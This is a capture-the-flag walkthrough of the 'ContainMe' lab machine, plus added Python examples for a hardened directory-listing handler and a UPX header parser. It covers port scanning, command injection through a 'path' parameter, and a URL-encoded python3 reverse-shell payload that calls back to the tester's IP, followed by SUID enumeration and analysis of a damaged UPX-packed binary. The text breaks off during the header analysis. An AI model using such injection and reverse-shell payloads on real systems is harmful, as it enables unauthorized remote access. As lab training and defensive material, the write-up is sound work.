Recon to foothold

We’ll start with a comprehensive scan

rob:ContainMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.235.206 --rate=1000 -e tun0
[sudo] password for rob: 
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-11-19 14:32:46 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 2222/tcp on 10.10.235.206                                 
Discovered open port 8022/tcp on 10.10.235.206                                 
Discovered open port 22/tcp on 10.10.235.206                                   
Discovered open port 80/tcp on 10.10.235.206 

And now an nmap scan of the ports we found

rob:ContainMe/ $ nmap -A -T4 -v -p22,80,2222,8022 10.10.235.206
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-19 14:38 GMT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating Ping Scan at 14:38
Scanning 10.10.235.206 [2 ports]
Completed Ping Scan at 14:38, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:38
Completed Parallel DNS resolution of 1 host. at 14:38, 0.01s elapsed
Initiating Connect Scan at 14:38
Scanning 10.10.235.206 [4 ports]
Discovered open port 22/tcp on 10.10.235.206
Discovered open port 80/tcp on 10.10.235.206
Discovered open port 8022/tcp on 10.10.235.206
Discovered open port 2222/tcp on 10.10.235.206
Completed Connect Scan at 14:38, 0.01s elapsed (4 total ports)
Initiating Service scan at 14:38
Scanning 4 services on 10.10.235.206
Completed Service scan at 14:41, 156.47s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.235.206.
Initiating NSE at 14:41
Completed NSE at 14:41, 30.03s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 1.03s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Nmap scan report for 10.10.235.206
Host is up (0.011s latency).

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
|   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
|   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Initiating NSE at 14:41
Completed NSE at 14:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.94 seconds

On port 80 we find the default apache2 page

On ports 22 and 8022 we seem to find genuine SSH servers

rob:ContainMe/ $ ssh -p 8022 root@10.10.235.206
The authenticity of host '[10.10.235.206]:8022 ([10.10.235.206]:8022)' can't be established.
ED25519 key fingerprint is SHA256:ukl7DOiM0F0+ttWzSZTK9gOkWtTtzs468ihfBUcib7A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.235.206]:8022' (ED25519) to the list of known hosts.
root@10.10.235.206's password: 
Permission denied, please try again.
root@10.10.235.206's password: 

And on port 2222 we find … nothing?

rob:ContainMe/ $ nc 10.10.235.206 2222


asdfedsafaswe

dsdsd


On port 8022 we find an interesting SSH version running; I haven’t seen ‘obfuscated’ in a banner before

rob:ContainMe/ $ nc 10.10.235.206 8022
SSH-2.0-OpenSSH_7.7p1 Ubuntu-4ppa1+obfuscated

Protocol mismatch.

On the other hand, port 22 seems pretty standard, albeit on version 7.6p1, which could allow username enumeration

SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

Let’s look closer at the web server on port 80, starting with a little dirbusting

rob:ContainMe/ $ dirsearch --url http://10.10.235.206/

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10831

Error Log: /opt/dirsearch/logs/errors-21-11-19_15-32-24.log

Target: http://10.10.235.206/

Output File: /opt/dirsearch/reports/10.10.235.206/_21-11-19_15-32-24.txt

[15:32:24] Starting: 
[15:32:25] 403 -  278B  - /.ht_wsr.txt
--snip--
[15:32:33] 200 -   11KB - /index.html
[15:32:33] 200 -  329B  - /index.php
[15:32:33] 200 -  329B  - /index.php/login/
[15:32:33] 200 -   69KB - /info.php

Task Completed

Ok, so we have a few files there. /index.html gives us the default view; let’s check out the others

/info.php gives us a PHPinfo page

And /index.php seems to give us a directory listing

However, when we look at the source code for the page we find a comment

<html>
<body>
	<pre>
	total 28K
drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
-rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
-rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
-rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
	<pre>

<!--  where is the path ?  -->

</body>
</html>

Perhaps the /index.php file can take a parameter?

Ok, yes it can!

It looks like the parameter we send is basically being passed to ls -la. Can we maybe inject additional commands? && doesn’t work, nor does ||, but ; gives us a result
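The pattern inferred above, as an added example in Python (not the challenge’s index.php, whose source we never see, and not code from the writeup): a “path” parameter string-built into “ls -la” and handed to a shell lets a “;” start a second command, while the hardened version below confines the path to the web root and runs ls with an argument list and no shell at all. The web root, file names and the “/;echo injected” input are constructed for the demo.

```python
"""Shell command injection through a path parameter: weak pattern beside the hardened one.

Added example; models what the writeup infers about index.php, it is not that file.
"""
import os
import subprocess
import tempfile

# Characters that let a shell string carry more than one command (for detection/logging,
# not as the fix: the fix is to never build a shell string from user input)
SHELL_METACHARS = set(";|&`$()<>\n")


def build_shell_command(path: str) -> str:
    """The weak pattern: the string a naive handler would pass to /bin/sh -c.
    Returned rather than executed, so the injected part is visible but never runs."""
    return f"ls -la {path}"


def carries_shell_metachars(path: str) -> bool:
    """Detection helper for request logs: does the parameter contain shell metacharacters?"""
    return any(c in SHELL_METACHARS for c in path)


def safe_listing(path: str, web_root: str):
    """Hardened handler: resolve the path under web_root, refuse anything that escapes it,
    and run ls with an argv list (no shell), so ';' is just part of a (non-existent) name."""
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, path.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes web root")
    proc = subprocess.run(["ls", "-la", "--", target], capture_output=True, text=True)
    return proc.returncode, proc.stdout


def demo() -> dict:
    """Run the three cases against a constructed web root and return what happened."""
    web_root = tempfile.mkdtemp(prefix="webroot-")   # constructed, stands in for /var/www/html
    open(os.path.join(web_root, "index.html"), "w").close()
    results = {}
    # Legitimate request: listing of the web root itself
    rc, out = safe_listing("/", web_root)
    results["clean_rc"], results["clean_has_index"] = rc, "index.html" in out
    # The same input that breaks the weak pattern: here it is only a file name that does not exist
    rc, out = safe_listing("/;echo injected", web_root)
    results["inject_rc"], results["inject_ran"] = rc, "injected" in out
    # Traversal attempt is refused before anything is executed
    try:
        safe_listing("../../../../etc", web_root)
        results["traversal_blocked"] = False
    except ValueError:
        results["traversal_blocked"] = True
    results["weak_command"] = build_shell_command("/;echo injected")
    results["flagged"] = carries_shell_metachars("/;echo injected")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18} {value}")
```

The point of the argv list is that the kernel receives “ls”, “-la”, “--” and one path argument; no shell ever parses the string, so there is nothing for a separator character to separate. The metacharacter check is worth keeping only as a signal for logs and alerts, since a denylist is what lets one separator through when others are blocked.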

We can try to inject a reverse shell then. We send our favourite python3 reverse shell

?path=/;export%20RHOST=%2210.14.6.26%22;export RHOST="10.14.6.26";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

And we pop a shell!

rob:ContainMe/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [10.10.232.54] 44320
www-data@host1:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data

After [[stablizing our shell]] we can start some manual enumeration. We can see from the minimal process list, apart from anything else, that we are in a container, so presumably our way forward is to escape

Checking SUID/SGID files we find something interesting

www-data@host1:/$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -la {} \; 2> /dev/null
-rwsr-xr-x 1 root root 358668 Jul 30 04:40 /usr/share/man/zh_TW/crypt
-rwxr-sr-x 1 root ssh 362640 Mar  4  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 39352 Nov 15  2017 /usr/bin/crontab
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
--snip--

That’s an odd place for an executable to be hiding out. We can find a non-SUID copy of what looks like the same file (same size, 358668 bytes) in /home/mike

www-data@host1:/home/mike$ ls -lA
total 376
lrwxrwxrwx 1 root mike      9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike   3771 Apr  4  2018 .bashrc
drwx------ 2 mike mike   4096 Jul 30 04:36 .cache
drwx------ 3 mike mike   4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike    807 Apr  4  2018 .profile
drwx------ 2 mike mike   4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx

Let’s [[exfil]] this file and have a look at it in Ghidra. First we can see that the file is packed with UPX

rob:ContainMe/ $ strings 1cryptupx
--snip--
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $
--snip--

Let’s try to unpack this first before we analyze it

rob:ContainMe/ $ upx -d 1cryptupx -o 1crypt
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: 1cryptupx: CantUnpackException: bad e_phoff

Unpacked 1 file: 0 ok, 1 error.

To reconstruct the UPX header, compare the bytes found in the file (left) with the expected header layout (right)

55 50 58 21         .byte 85,80,88,33       // 0    UPX_MAGIC_LE32
84 09 0D 16         .byte 161,216,208,213   //      UPX_MAGIC2_LE32
00 00 00 00         .long 0                 // 8    uncompressed adler32
D0 A9 0D 00         .long 0                 // 12   compressed adler32
                   
D0 A9 0D 00         .long   0               // 16   uncompressed len
00 02 00 00         .long   0               // 20   compressed len
A7 00 00 00         .long   0               // 24   original file size
08                  .byte   0               // 28   filter id
00                  .byte   0               // 29   filter cto
00                  .byte   0               //      unused
00                  .byte   45              // 31   header checksum
// From ../p_unix.h
struct b_info {     // 12-byte header before each compressed block
    uint32_t sz_unc;            // uncompressed_size
    uint32_t sz_cpr;            // compressed_size
    unsigned char b_method;     // compression algorithm
    unsigned char b_ftid;       // filter id
    unsigned char b_cto8;       // filter parameter
    unsigned char b_unused;
};

struct l_info       // 12-byte trailer in header for loader (offset 116)
{
    uint32_t l_checksum;
    uint32_t l_magic;
    uint16_t l_lsize;
    uint8_t  l_version;
    uint8_t  l_format;
};

struct p_info       // 12-byte packed program header follows stub loader
{
    uint32_t p_progid;
    uint32_t p_filesize;
    uint32_t p_blocksize;
};
000000D0  00 00 00 00  00 00 00 00   00 00 00 00  00 00 00 00                        ................
000000E0  10 00 00 00  00 00 00 00   F8 3E 38 8A  55 50 58 21                        .........>8.UPX!
000000F0  84 09 0D 16  00 00 00 00   D0 A9 0D 00  D0 A9 0D 00                        ................
00000100  00 02 00 00  A7 00 00 00   08 00 00 00  BB FB 20 FF                        .............. .
00000110  7F 45 4C 46  02 01 01 00   02 00 3E 00  1B 70 1C 40                        .ELF......>..p.@
00000120  1F EF 36 F6  ED 40 2F 90   A3 0D 47 26  38 00 08 0A                        ..6..@/...G&8...
00000130  19 0F 36 B0  DF 00 18 57   04 00 01 40  0F 88 04 5A                        ..6....W...@...Z
00000140  97 3D 90 00  00 10 0D 6F   05 1F 03 F9  40 DA 0E 40                        .=.....o....@..@
00000150  29 32 09 60  6F 5F 60 6F   95 50 2F 50  49 0F 6F 60                        )2.`o_`o.P/PI.o`
00057190  88 5E 24 10  BA 0C 13 89   EF E8 96 A2  8B FD 6F 68                        .^$...........oh
000571A0  0B A4 10 8B  28 14 B6 75   15 81 FE 55  50 58 21 75                        ....(..u...UPX!u
000571B0  11 77 C1 BF  B7 5E 7D 00   60 B5 4C EB  04 85 F6 75                        .w...^}.`.L....u
000571C0  01 44 5C DB  0D ED FF 39   C6 77 F2 89  C2 48 3B 13                        .D\....9.w...H;.
000571D0  77 EB 14 48  70 08 73 6C   92 54 24 68  AF 1D 6C FA                        w..Hp.sl.T$h..l.
000571E0  8B 7D 58 4C  10 44 A0 18   24 C2 6C 76  DD 2B FE D5                        .}XL.D..$.lv.+..
000571F0  A4 C6 BD 48  BE 38 5C 75   B8 F8 F6 7F  13 6E 42 19                        ...H.8\u.....nB.
00057200  84 C9 0F 95  C2 31 C0 4D   85 E4 0E C0  85 C2 74 1D                        .....1.M......t.
00057210  CD DE D0 6E  BA FE 00 02   BE 77 4A 39  33 75 0F 46                        ...n.....wJ93u.F
00057220  9C 1A 29 78  6D 6B 08 C9   6A 7B 08 88  D4 80 14 BC                        ..)xmk..j{......
00057230  45 F0 36 B8  E0 45 18 0D   89 F2 6E 04  C6 E8 DB FE                        E.6..E....n.....
00057240  9B 7D 5A 77  74 54 B7 03   3A 53 D0 48  DC 30 03 E9                        .}ZwtT..:S.H.0..
00057250  7F D8 FF 87  14 4B C4 28   5B 5D 41 5C  41 5D C3 2A                        .....K.([]A\A].*
00057260  96 D1 74 36  0F BF A2 FD   40 F6 C7 01  75 30 5A 0F                        ..t6....@...u0Z.
000578C0  2F 81 2D 98  86 7F 27 7F   0F A6 DB 54  81 03 AF 97                        /.-...'....T....
000578D0  7F F4 FF 92  24 09 8B 00   00 2A 49 FF  00 00 00 00                        ....$....*I.....
000578E0  55 50 58 21  00 00 00 00   55 50 58 21  0D 16 08 09                        UPX!....UPX!....
000578F0  6E 14 E6 78  C6 22 2C C7   60 07 00 00  42 02 00 00                        n..x.",.`...B...
00057900  D0 A9 0D 00  49 1B 00 A2   F4 00 00 00
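A parser for these structures, added here as a worked example (it is not code from the writeup or from UPX). The byte strings are transcribed from the dump above, at 0xE8 and at 0x578E8; the layouts are the l_info / p_info / b_info structs quoted from p_unix.h plus the 32-byte PackHeader that UPX appends at the end of every packed file, and the checksum rule (byte sum after the 4-byte magic, excluding the checksum byte, mod 251) follows UPX’s packhead.cpp. In my reading, the bytes at 0xEC that the notes above line up against PackHeader fields are the l_info magic followed by p_info and b_info, and the PackHeader proper, whose checksum verifies, is the block at 0x578E8; upx’s “bad e_phoff” complaint refers to the ELF header’s program-header offset, not to these UPX structures. The METHODS and FORMATS names are the conf.h values as I recall them.

```python
"""Parse the UPX headers of 1cryptupx from bytes transcribed out of the writeup's hexdump.

Added example, not part of the writeup and not UPX's own code.
"""
import struct

UPX_MAGIC = b"UPX!"

# Front of the file, offsets 0xE8..0x113 in the dump (transcribed): l_info, p_info, b_info,
# then the first bytes of the compressed block
SAMPLE_FRONT = bytes.fromhex(
    "F83E388A 55505821 84090D16"   # l_info  @0xE8
    "00000000 D0A90D00 D0A90D00"   # p_info  @0xF4
    "00020000 A7000000 08000000"   # b_info  @0x100
    "BBFB20FF 7F454C46"            # compressed data @0x10C
)
# Tail of the file, offset 0x578E8 to EOF (transcribed): PackHeader (32 bytes) + overlay offset
SAMPLE_TRAILER = bytes.fromhex(
    "55505821 0D160809 6E14E678 C6222CC7"
    "60070000 42020000 D0A90D00 491B00A2"
    "F4000000"
)

L_INFO = struct.Struct("<I4sHBB")               # l_checksum, l_magic, l_lsize, l_version, l_format
P_INFO = struct.Struct("<III")                  # p_progid, p_filesize, p_blocksize
B_INFO = struct.Struct("<IIBBBB")               # sz_unc, sz_cpr, b_method, b_ftid, b_cto8, b_unused
PACKHEADER = struct.Struct("<4sBBBBIIIIIBBBB")  # magic, version, format, method, level, u_adler,
                                                # c_adler, u_len, c_len, u_file_size, filter,
                                                # filter_cto, n_mru, checksum
METHODS = {2: "NRV2B_LE32", 5: "NRV2D_LE32", 8: "NRV2E_LE32", 14: "LZMA"}  # UPX conf.h (recalled)
FORMATS = {22: "LINUX_ELF64_AMD"}                                          # UPX conf.h (recalled)


def packheader_checksum(hdr: bytes) -> int:
    """UPX's header checksum: sum of bytes 4..30 of the 32-byte PackHeader, reduced mod 251."""
    return sum(hdr[4:PACKHEADER.size - 1]) % 251


def parse_front(data: bytes) -> dict:
    """Locate the first UPX! magic (l_info.l_magic) and unpack the three 12-byte structs."""
    magic_at = data.find(UPX_MAGIC)
    if magic_at < 4:
        raise ValueError("no UPX! magic with room for l_checksum before it")
    base = magic_at - 4                       # l_info starts 4 bytes before its magic
    l = L_INFO.unpack_from(data, base)
    p = P_INFO.unpack_from(data, base + L_INFO.size)
    b = B_INFO.unpack_from(data, base + L_INFO.size + P_INFO.size)
    info = {
        "l_checksum": l[0], "l_magic": l[1], "l_lsize": l[2], "l_version": l[3], "l_format": l[4],
        "p_progid": p[0], "p_filesize": p[1], "p_blocksize": p[2],
        "sz_unc": b[0], "sz_cpr": b[1], "b_method": b[2], "b_ftid": b[3], "b_cto8": b[4],
        "data_offset": base + L_INFO.size + P_INFO.size + B_INFO.size,
    }
    # Consistency checks an analyst wants before trusting the block table
    info["checks"] = {
        "magic": l[1] == UPX_MAGIC,
        "method_known": b[2] in METHODS,
        "block_fits": b[1] <= b[0] <= p[2],   # compressed <= uncompressed <= blocksize
    }
    return info


def parse_packheader(tail: bytes) -> dict:
    """Unpack the trailing PackHeader and verify its checksum against the stored byte."""
    start = len(tail) - PACKHEADER.size - 4   # PackHeader, then a 4-byte overlay offset at EOF
    hdr = tail[start:start + PACKHEADER.size]
    names = ("magic", "version", "format", "method", "level", "u_adler", "c_adler",
             "u_len", "c_len", "u_file_size", "filter", "filter_cto", "n_mru", "checksum")
    ph = dict(zip(names, PACKHEADER.unpack(hdr)))
    (ph["overlay_offset"],) = struct.unpack_from("<I", tail, start + PACKHEADER.size)
    ph["checksum_calc"] = packheader_checksum(hdr)
    ph["checksum_ok"] = ph["checksum_calc"] == ph["checksum"]
    ph["magic_ok"] = ph["magic"] == UPX_MAGIC
    ph["format_name"] = FORMATS.get(ph["format"], "unknown")
    ph["method_name"] = METHODS.get(ph["method"], "unknown")
    return ph


if __name__ == "__main__":
    for k, v in parse_front(SAMPLE_FRONT).items():
        print(f"front  {k:15} {v}")
    for k, v in parse_packheader(SAMPLE_TRAILER).items():
        print(f"tail   {k:15} {v}")
```

Run as-is it prints both decoded headers; with a real sample, feed it the first few hundred bytes after the program headers and the last 36 bytes of the file. A stored checksum that matches the recomputed one, together with sane sizes in b_info, tells you the UPX-side metadata is intact and narrows the search for what was tampered with to the ELF header that upx reports as bad.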